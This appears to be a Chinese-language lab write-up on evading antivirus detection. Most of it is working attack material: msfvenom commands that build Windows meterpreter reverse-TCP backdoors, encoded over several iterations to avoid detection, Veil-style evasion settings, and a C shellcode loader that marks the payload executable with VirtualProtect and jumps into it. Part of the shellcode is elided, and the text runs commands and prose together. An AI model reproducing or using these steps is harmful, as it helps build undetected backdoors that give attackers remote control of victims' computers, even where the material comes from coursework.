將上次實驗生成的後門程序放到virscan上python
咦?爲啥說有廣告,只能改個名啦linux
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.206.132 LPORT=5205 -f exe > 5205-encode10.exe
use evasion use python/meterpreter/rev_tcp.py set LHOST 192.168.206.132 set LPORT 5205
generate
生成payload,名字設爲payload5205.list
查看能夠use啥,看到了這個7,咱們從新作一遍上面的設置。use evasion use 7 set LHOST 192.168.206.132 set LPORT 5205
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.132 LPORT=443 -f c
生成shellcodei686-w64-mingw32-g++ 5205.c -o 5205.exe
將.c文件轉換爲可執行文件5205.exe#include "stdafx.h" #include <windows.h> #include <winbase.h> #include <stdio.h> #include <stdlib.h> #include <string.h> //192.168.6.129 443 reverse_tcp const char met[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" "此處省去若干行" "\x53\xff\xd5"; int main() { DWORD old = 0; BOOL ret = VirtualProtect((LPVOID)met, strlen(met), PAGE_EXECUTE_READWRITE, &old); INT32 * addr; addr =(INT32*) &met; __asm; { call addr; } return 0; }
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai x86/bloxer -i 10 LHOST=192.168.206.132 LPORT=5205 -f c